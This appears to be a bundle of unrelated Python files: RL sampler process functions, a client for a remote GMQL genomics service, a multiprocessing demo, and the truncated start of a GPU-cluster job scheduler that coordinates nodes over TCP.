def run_async_sampler(sampler, affinity, ctrl, traj_infos_queue, n_itr):
"""
Target function for the process which will run the sampler, in the case of
online performance logging. Toggles the sampler's double-buffer for each
iteration, waits for the memory copier to finish before writing into that
buffer, and signals the memory copier when the sampler is done writing a
minibatch.
"""
sampler.initialize(affinity)
db_idx = 0
for itr in range(n_itr):
ctrl.sample_copied[db_idx].acquire()
traj_infos = sampler.obtain_samples(itr, db_idx)
ctrl.sample_ready[db_idx].release()
with ctrl.sampler_itr.get_lock():
for traj_info in traj_infos:
traj_infos_queue.put(traj_info)
ctrl.sampler_itr.value = itr
db_idx ^= 1 # Double buffer.
logger.log(f"Async sampler reached final itr: {itr + 1}, quitting.")
ctrl.quit.value = True # This ends the experiment.
sampler.shutdown()
for s in ctrl.sample_ready:
s.release() # Let memcpy workers finish and quit.
def run_async_sampler_eval(sampler, affinity, ctrl, traj_infos_queue,
n_itr, eval_itrs):
"""
Target function running the sampler with offline performance evaluation.
"""
sampler.initialize(affinity)
db_idx = 0
for itr in range(n_itr + 1): # +1 to get last eval :)
ctrl.sample_copied[db_idx].acquire()
# assert not ctrl.sample_copied[db_idx].acquire(block=False) # Debug check.
sampler.obtain_samples(itr, db_idx)
ctrl.sample_ready[db_idx].release()
if itr % eval_itrs == 0:
eval_time = -time.time()
traj_infos = sampler.evaluate_agent(itr)
eval_time += time.time()
ctrl.eval_time.value += eval_time # Not atomic but only writer.
with ctrl.sampler_itr.get_lock():
for traj_info in traj_infos:
traj_infos_queue.put(traj_info)
traj_infos_queue.put(None) # Master will get until None sentinel.
ctrl.sampler_itr.value = itr
else:
ctrl.sampler_itr.value = itr
db_idx ^= 1 # Double buffer
logger.log(f"Async sampler reached final itr: {itr + 1}, quitting.")
ctrl.quit.value = True # This ends the experiment.
sampler.shutdown()
for s in ctrl.sample_ready:
s.release() # Let memcpy workers finish and quit.
def memory_copier(sample_buffer, samples_to_buffer, replay_buffer, ctrl):
"""
Target function for the process which will copy the sampler's minibatch buffer
into the algorithm's main replay buffer.
Args:
sample_buffer: The (single) minibatch buffer from the sampler, on shared memory.
samples_to_buffer: A function/method from the algorithm to process samples from the minibatch buffer into the replay buffer (e.g. select which fields, compute some prioritization).
replay_buffer: Algorithm's main replay buffer, on shared memory.
ctrl: Structure for communicating when the minibatch is ready to copy/done copying.
Warning:
Although this function may use the algorithm's ``samples_to_buffer()``
method, here it is running in a separate process, so will not be aware
of changes in the algorithm from the optimizer process. Furthermore,
it may not be able to store state across iterations--in the
implemented setup, two separate memory copier processes are used, so
each one only sees every other minibatch. (Could easily change to
single copier if desired, and probably without peformance loss.)
"""
# Needed on some systems to avoid mysterious hang:
torch.set_num_threads(1)
# (Without torch.set_num_threads, experienced hang on Ubuntu Server 16.04
# machines (but not Desktop) when appending samples to make replay buffer
# full, but only for batch_B > 84 (dqn + r2d1 atari), regardless of replay
# size or batch_T. Would seem to progress through all code in
# replay.append_samples() but simply would not return from it. Some
# tipping point for MKL threading?)
while True:
ctrl.sample_ready.acquire()
# assert not ctrl.sample_ready.acquire(block=False) # Debug check.
if ctrl.quit.value:
break
replay_buffer.append_samples(samples_to_buffer(sample_buffer))
ctrl.sample_copied.release()
logger.log("Memory copier shutting down.")
def placeholder(x):
pass
|
RemoteManager.py
|
from . import default_address, headers
from ..managers import get_python_manager
from ..settings import is_progress_enabled
import requests, time, logging, json
from requests_toolbelt.multipart.encoder import MultipartEncoderMonitor, MultipartEncoder
import pandas as pd
from ..dataset.GDataframe import GDataframe
from ..dataset.parsers.RegionParser import RegionParser
from ..dataset.parsers import GTF
from ..dataset.DataStructures import chr_aliases, start_aliases, stop_aliases, strand_aliases
from ..dataset.loaders import Loader
from ..FileManagment import TempFileManager
import os, zipfile
from tqdm import tqdm
from ..dataset.storers.parserToXML import parserToXML
import warnings
import threading
import numpy as np
from ..dataset.loaders import FILES_FOLDER, SCHEMA_FILE
good_status = ['PENDING', 'RUNNING', 'DS_CREATION_RUNNING']
CHUNK_SIZE = 5 * 1024 * 1024 # 5 MB
class RemoteManager:
""" Manager of the user connection with the remote GMQL service
"""
def __init__(self, address=None, auth_token=None):
""" Instantiate a new RemoteManager. If no address is provided, the default address will
be used, which represents the current server hosted by the Dept. of Electronics, Information
and Bioengineering of Politecnico di Milano.
:param address: (optional) the address of the remote GMQL service
"""
# checking of the address
if address is None:
self.address = default_address
elif isinstance(address, str):
address = address.strip()
if address.endswith("/"):
self.address = address[:-1]
else:
self.address = address
else:
raise TypeError("The remote URL must be a string."
" {} was provided".format(type(address)))
# checking the existence of the remote service
req = requests.get(self.address + "/")
if req.status_code != 200:
raise ConnectionError("The server at {} is not responding".format(self.address))
self.logger = logging.getLogger()
# checking of the auth_token
if auth_token is not None:
header = self.__get_header(auth_token)
url = self.address + "/datasets"
response = requests.get(url, headers=header)
if response.status_code == 200:
# the auth_token is valid
# print("VALID AUTH TOKEN")
self.auth_token = auth_token
elif response.status_code == 401 and \
response.json().get("error") == 'UnAuthenticatedRequest':
# print("NOT-VALID AUTH TOKEN")
self.auth_token = None
else:
raise ValueError("Unknown state. {} ".format(response.status_code))
else:
self.auth_token = None
self.json_encoder = json.JSONEncoder()
"""
Security controls
"""
def register(self, first_name, last_name, user_name, email, password):
url = self.address + "/register"
body = {
"firstName" : first_name,
"lastName": last_name,
"username": user_name,
"email": email,
"password": password
}
response = requests.post(url, data=json.dumps(body))
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
def login(self, username=None, password=None):
""" Before doing any remote operation, the user has to login to the GMQL serivice.
This can be done in the two following ways:
* Guest mode: the user has no credentials and uses the system only as a temporary guest
* Authenticated mode: the users has credentials and a stable remote account
If neither username and password are specified, the user enters the system as a guest.
If both are specified and they correspond to an existent user, the user enters as an
authenticated user
:param username: (optional)
:param password: (optional)
:return: None
"""
if (username is None) and (password is None):
auth_token = self.__login_guest()
elif (username is not None) and (password is not None):
auth_token, fullName = self.__login_credentials(username, password)
self.logger.info("You are logged as {}".format(fullName))
else:
raise ValueError("you have to specify both username and password or nothing")
if auth_token is not None:
self.auth_token = auth_token
else:
raise ConnectionError("Impossible to retrieve the authentication token")
def auto_login(self, how="guest"):
if self.auth_token is None:
if how != 'guest':
warnings.warn("The authentication token for your account is expired. "
"You need to redo the login using the pygmql tool. "
"For now you will be logged as guest user")
self.auth_token = self.__login_guest()
return "guest"
else:
return how
def __login_guest(self):
url = self.address + "/guest"
response = requests.get(url=url, headers=headers)
response = response.json()
return response.get("authToken")
def __login_credentials(self, username, password):
url = self.address + "/login"
body = {
"username": username,
"password": password
}
# body = self.json_encoder.encode(body)
response = requests.post(url, data=json.dumps(body), headers=headers)
response = response.json()
errorString = response.get("errorString")
if errorString is not None:
raise ValueError(errorString)
else:
auth_token = response.get("authToken")
fullName = response.get("fullName")
return auth_token, fullName
@staticmethod
def __get_header(auth_token):
header = headers.copy()
header['X-AUTH-TOKEN'] = auth_token
return header
def __check_authentication(self):
if self.auth_token is not None:
return self.__get_header(self.auth_token)
else:
raise EnvironmentError("you first need to login before doing operations")
def logout(self):
""" Logout from the remote account
:return: None
"""
url = self.address + "/logout"
header = self.__check_authentication()
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
"""
Repository
"""
@staticmethod
def process_info_list(res, info_column):
def extract_infos(row):
infoList = row['infoList']
result = {}
for d in infoList:
result[d['key']] = d['value']
return result
if info_column in res.columns:
res = pd.concat([res, pd.DataFrame.from_dict(res[info_column].map(extract_infos).tolist())], axis=1)\
.drop("info", axis=1)
return res
def get_dataset_list(self):
""" Returns the list of available datasets for the current user.
:return: a pandas Dataframe
"""
url = self.address + "/datasets"
header = self.__check_authentication()
response = requests.get(url, headers=header)
response = response.json()
datasets = response.get("datasets")
res = pd.DataFrame.from_dict(datasets)
return self.process_info_list(res, "info")
def get_dataset_samples(self, dataset_name, owner=None):
""" Get the list of samples of a specific remote dataset.
:param dataset_name: the dataset name
:param owner: (optional) who owns the dataset. If it is not specified, the current user
is used. For public dataset use 'public'.
:return: a pandas Dataframe
"""
if isinstance(owner, str):
owner = owner.lower()
dataset_name = owner + "." + dataset_name
header = self.__check_authentication()
url = self.address + "/datasets/" + dataset_name
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
response = response.json()
samples = response.get("samples")
if len(samples) == 0:
return None
res = pd.DataFrame.from_dict(samples)
return self.process_info_list(res, "info")
def get_dataset_schema(self, dataset_name, owner=None):
""" Given a dataset name, it returns a BedParser coherent with the schema of it
:param dataset_name: a dataset name on the repository
:param owner: (optional) who owns the dataset. If it is not specified, the current user
is used. For public dataset use 'public'.
:return: a BedParser
"""
if isinstance(owner, str):
owner = owner.lower()
dataset_name = owner + "." + dataset_name
url = self.address + "/datasets/" + dataset_name+"/schema"
header = self.__check_authentication()
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
response = response.json()
name = response.get("name")
schemaType = response.get("type")
coordinates_system = response.get("coordinate_system")
fields = response.get("fields")
i = 0
chrPos, startPos, stopPos, strandPos = None, None, None, None
otherPos = []
if schemaType == GTF:
chrPos = 0 # seqname
startPos = 3 # start
stopPos = 4 # end
strandPos = 6 # strand
otherPos = [(1, 'source', 'string'), (2, 'feature', 'string'),
(5, 'score', 'float'), (7, 'frame', 'string')]
for field in fields:
fieldName = field.get("name")
fieldType = field.get("type").lower()
if fieldName.lower() not in {'seqname', 'start', 'end', 'strand',
'source', 'feature', 'score', 'frame'}:
otherPos.append((i, fieldName, fieldType))
i += 1
else:
for field in fields:
fieldName = field.get("name")
fieldType = field.get("type").lower()
if fieldName.lower() in chr_aliases and chrPos is None:
chrPos = i
elif fieldName.lower() in start_aliases and startPos is None:
startPos = i
elif fieldName.lower() in stop_aliases and stopPos is None:
stopPos = i
elif fieldName.lower() in strand_aliases and strandPos is None:
strandPos = i
else: # other positions
otherPos.append((i, fieldName, fieldType))
i += 1
if len(otherPos) == 0:
otherPos = None
return RegionParser(chrPos=chrPos,
startPos=startPos,
stopPos=stopPos,
strandPos=strandPos,
otherPos=otherPos,
schema_format=schemaType,
coordinate_system=coordinates_system,
delimiter="\t", parser_name=name)
def upload_dataset(self, dataset, dataset_name, schema_path=None):
""" Upload to the repository an entire dataset from a local path
:param dataset: the local path of the dataset
:param dataset_name: the name you want to assign to the dataset remotely
:return: None
"""
url = self.address + "/datasets/" + dataset_name + "/uploadSample"
header = self.__check_authentication()
fields = dict()
remove = False
if isinstance(dataset, GDataframe):
tmp_path = TempFileManager.get_new_dataset_tmp_folder()
dataset.to_dataset_files(local_path=tmp_path)
dataset = tmp_path
remove = True
# a path is provided
if not isinstance(dataset, str):
raise TypeError("Dataset can be a path or a GDataframe. {} was passed".format(type(dataset)))
file_paths, schema_path_found = Loader.get_file_paths(dataset)
if schema_path is None:
schema_path = schema_path_found
fields['schema'] = (os.path.basename(schema_path), open(schema_path, "rb"), 'application/octet-stream')
for i, file in enumerate(file_paths):
fields["file"+str(i + 1)] = (os.path.basename(file), open(file, "rb"), 'application/octet-stream')
encoder = MultipartEncoder(fields)
callback = create_callback(encoder, len(fields))
m_encoder = MultipartEncoderMonitor(encoder, callback)
header['Content-Type'] = m_encoder.content_type
self.logger.debug("Uploading dataset at {} with name {}".format(dataset, dataset_name))
response = requests.post(url, data=m_encoder,
headers=header)
# closing files
for fn in fields.keys():
_, f, _ = fields[fn]
f.close()
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.content))
if remove:
TempFileManager.delete_tmp_dataset(dataset)
def delete_dataset(self, dataset_name):
""" Deletes the dataset having the specified name
:param dataset_name: the name that the dataset has on the repository
:return: None
"""
url = self.address + "/datasets/" + dataset_name
header = self.__check_authentication()
response = requests.delete(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
self.logger.debug("Dataset {} was deleted from the repository".format(dataset_name))
"""
Download repository
"""
def download_dataset(self, dataset_name, local_path, how="stream"):
""" It downloads from the repository the specified dataset and puts it
in the specified local folder
:param dataset_name: the name the dataset has in the repository
:param local_path: where you want to save the dataset
:param how: 'zip' downloads the whole dataset as a zip file and decompress it; 'stream'
downloads the dataset sample by sample
:return: None
"""
if not os.path.isdir(local_path):
os.makedirs(local_path)
else:
raise ValueError("Path {} already exists!".format(local_path))
local_path = os.path.join(local_path, FILES_FOLDER)
os.makedirs(local_path)
if how == 'zip':
return self.download_as_zip(dataset_name, local_path)
elif how == 'stream':
return self.download_as_stream(dataset_name, local_path)
else:
raise ValueError("how must be {'zip', 'stream'}")
def download_as_zip(self, dataset_name, local_path):
header = self.__check_authentication()
url = self.address + "/datasets/" + dataset_name + "/zip"
self.logger.debug("Downloading dataset {} to {}".format(dataset_name, local_path))
response = requests.get(url, stream=True, headers=header)
if response.status_code != 200:
raise ValueError("Code {}: {}".format(response.status_code, response.json().get("error")))
tmp_zip = os.path.join(local_path, "tmp.zip")
f = open(tmp_zip, "wb")
total_size = int(response.headers.get("content-length", 0))
# TODO: find a better way to display the download progression
for chunk in tqdm(response.iter_content(chunk_size=CHUNK_SIZE), total=total_size/CHUNK_SIZE,
disable=not is_progress_enabled(), unit="B", unit_scale=True):
if chunk:
f.write(chunk)
f.close()
with zipfile.ZipFile(tmp_zip, "r") as zip_ref:
zip_ref.extractall(local_path)
os.remove(tmp_zip)
def download_as_stream(self, dataset_name, local_path):
N_THREADS = 10
def thread_download(sample_names):
for sn in sample_names:
self.download_sample(dataset_name=dataset_name,
sample_name=sn,
local_path=local_path,
how="all",
header=False)
pbar.update()
samples = self.get_dataset_samples(dataset_name)
if samples is not None:
threads = []
ids = samples.id.unique()
pbar = tqdm(total=len(ids), disable=not is_progress_enabled())
splits = np.array_split(ids, N_THREADS)
for ssn in splits:
names = samples[samples.id.isin(ssn)].name.values
t = threading.Thread(target=thread_download, args=(names, ))
t.start()
threads.append(t)
for t in threads:
t.join()
pbar.close()
schema = self.get_dataset_schema(dataset_name=dataset_name)
parserToXML(parser=schema, datasetName=dataset_name, path=os.path.join(local_path, SCHEMA_FILE))
def download_sample(self, dataset_name, sample_name, local_path, how="all", header=False):
header_get = self.__check_authentication()
url = self.address + "/datasets/{}/{}/{}?header={}"
region = False
meta = False
sample_path = os.path.join(local_path, sample_name + ".gdm")
region_path = sample_path
meta_path = sample_path + ".meta"
if how == 'regs':
region = True
elif how == 'meta':
meta = True
elif how == 'all':
region = True
meta = True
else:
raise ValueError("how must be {'regs', 'meta', 'all'}")
header = "true" if header else "false"
if region:
url_region = url.format(dataset_name, sample_name, "region", header)
response = requests.get(url_region, stream=True, headers=header_get)
with open(region_path, "wb") as f:
for data in response.iter_content(chunk_size=CHUNK_SIZE):
f.write(data)
if meta:
url_meta = url.format(dataset_name, sample_name, "metadata", header)
response = requests.get(url_meta, stream=True, headers=header_get)
with open(meta_path, "wb") as f:
for data in response.iter_content(chunk_size=CHUNK_SIZE):
f.write(data)
"""
Query
"""
def query(self, query, output_path=None, file_name="query", output="tab"):
""" Execute a GMQL textual query on the remote server.
:param query: the string containing the query
:param output_path (optional): where to store the results locally. If specified
the results are downloaded locally
:param file_name (optional): the name of the query
:param output (optional): how to save the results. It can be "tab" or "gtf"
:return: a pandas dataframe with the dictionary ids of the results
"""
header = self.__check_authentication()
header['Content-Type'] = "text/plain"
output = output.lower()
if output not in ['tab', 'gtf']:
raise ValueError("output must be 'tab' or 'gtf'")
url = self.address + "/queries/run/" + file_name + '/' + output
response = requests.post(url, data=query, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
jobid = response.get("id")
self.logger.debug("JobId: {}. Waiting for the result".format(jobid))
status_resp = self._wait_for_result(jobid)
datasets = status_resp.get("datasets")
return self.__process_result_datasets(datasets, output_path)
def __process_result_datasets(self, datasets, output_path=None):
result = []
for dataset in datasets:
name = dataset.get("name")
if output_path is not None:
path = os.path.join(output_path, name)
self.download_dataset(dataset_name=name, local_path=path)
else:
path = None
result.append({'dataset': name, 'path': path})
return pd.DataFrame.from_dict(result)
def _wait_for_result(self, jobid):
count = 1
while True:
status_resp = self.trace_job(jobid)
status = status_resp["status"]
if status == 'SUCCESS':
break
elif status in good_status:
print("\r" + " "*50, end="")
dots = "." * (count % 4)
print("\r" + status + dots, end="")
else:
message = status_resp['message']
raise ValueError("Status: {}. Error during query execution: {}"
.format(status, message))
count += 1
time.sleep(1)
return status_resp
# def execute_remote(self, dataset, output="tab"):
# if not isinstance(dataset, GMQLDataset):
# raise TypeError("A GMQLDataset is required. {} was found".format(type(dataset)))
#
# dag = dataset._get_serialized_dag()
# self._execute_dag(dag, output)
# # TODO: complete...
def execute_remote_all(self, output="tab", output_path=None):
pmg = get_python_manager()
serialized_dag = pmg.get_serialized_materialization_list()
pmg.getServer().clearMaterializationList()
return self._execute_dag(serialized_dag, output, output_path)
def _execute_dag(self, serialized_dag, output="tab", output_path=None):
header = self.__check_authentication()
header['Content-Type'] = "text/plain"
output = output.lower()
if output not in ['tab', 'gtf']:
raise ValueError("output must be 'tab' or 'gtf'")
url = self.address + "/queries/dag/" + output
body = serialized_dag
response = requests.post(url=url, data=body, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
jobid = response.get("id")
self.logger.debug("JobId: {}. Waiting for the result".format(jobid))
status_resp = self._wait_for_result(jobid)
datasets = status_resp.get("datasets")
if isinstance(output_path, bool):
if output_path:
output_path = TempFileManager.get_new_dataset_tmp_folder()
else:
output_path = None
return self.__process_result_datasets(datasets, output_path)
def get_memory_usage(self):
header = self.__check_authentication()
url = self.address + "/getMemoryUsage"
response = requests.get(url, headers=header)
if response.status_code != 200:
raise ValueError("Code {}. {}".format(response.status_code, response.json().get("error")))
response = response.json()
info_list = response.get("infoList")
index = []
values = []
for d in info_list:
key = d['key']
index.append(key)
value = d['value']
values.append(value)
return pd.Series(data=values, index=index)
"""
Execution
"""
def trace_job(self, jobId):
""" Get information about the specified remote job
:param jobId: the job identifier
:return: a dictionary with the information
"""
header = self.__check_authentication()
status_url = self.address + "/jobs/" + jobId + "/trace"
status_resp = requests.get(status_url, headers=header)
if status_resp.status_code != 200:
raise ValueError("Code {}. {}".format(status_resp.status_code, status_resp.json().get("error")))
return status_resp.json()
def create_callback(encoder, n_files=None):
encoder_len = encoder.len
if n_files is not None:
tot_len = n_files
byte_per_file = encoder_len / n_files
else:
tot_len = encoder_len
if is_progress_enabled():
bar = tqdm(total=tot_len)
if n_files is not None:
def callback(monitor):
bar.update(max(int((monitor.bytes_read / byte_per_file) - bar.n), 0))
return callback
def callback(monitor):
bar.update(monitor.bytes_read - bar.n)
return callback
else:
def callback(monitor):
pass
return callback
|
print_process_info.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from multiprocessing import Process
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('Hello,', name)
if __name__ == '__main__':
info('main line')
print()
p = Process(target=f, args=('bob',))
p.start()
p.join()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
import gpu_pwr
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
V100_epoch_time = {}
for item in queue:
V100_epoch_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
promote_start_time = {}
for item in queue:
promote_start_time[str(item)] = 0
demote_list = []
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
index = 0
all_jobs_started = False
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0170'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 4, weights='distance')
model.fit(x_train, y_train)
####################################################################
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug, demotion shouldnt happen because no practical complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def min_speedup_demotion(K80_job, demote_list):
num_demote = len(demote_list)
global speedup_dict
# selectively demote among active K80 jobs and demote list jobs
K80_qual = list(set(list(K80_job.values())))
if 'idle' in K80_qual:
K80_qual.remove('idle')
K80_pool = list(set(K80_qual).union(demote_list))
if len(K80_pool) <= 8: # demote all jobs, no promotion
return [], demote_list[:] # must return a copy, otherwise the output points to the same address as input
else: # promote the top 4 jobs
pool_dict = {}
for job in K80_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:8] # 8 least speedup jobs
demotion_list = list(set(demote_list).intersection(sorted_pool))
promotion_list = list(set(list(K80_job.values())).difference(sorted_pool))
if 'idle' in promotion_list:
promotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicate too frequently
def kill_job(node, job): # kill_job('c2176', '50')
send_signal(node, 'kill ' + job)
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
V100_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
# measure job
def measure_job(node, gpu, job):
cmd = 'measure ' + job + ' gpu ' + gpu
send_signal(node, cmd)
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
